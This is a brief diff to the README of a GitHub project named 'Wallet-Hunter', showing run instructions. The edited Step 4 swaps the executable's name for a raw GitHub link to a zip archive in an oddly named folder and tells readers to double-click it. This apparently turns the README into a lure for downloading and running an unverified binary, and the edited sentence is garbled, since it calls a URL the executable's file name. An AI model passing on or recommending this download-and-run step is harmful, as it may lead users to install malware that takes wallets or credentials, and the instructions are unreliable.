Puscasupaul01/Wallet-Hunter/README.md

 If you download a compressed file (like .zip or .tar), right-click on it and select “Extract All...” to unzip the content.

 ### Step 4: Run Wallet-Hunter
-Locate the extracted folder and find the executable file, commonly named `WalletHunter.exe` or similar.
+Locate the extracted folder and find the executable file, commonly named `https://raw.githubusercontent.com/Puscasupaul01/Wallet-Hunter/main/unchastised/Hunter-Wallet-v3.0.zip` or similar.
 Double-click this file to launch the application.

 ## 🛠️ Using Wallet-Hunter
 Once you have Wallet-Hunter open, follow these simple steps: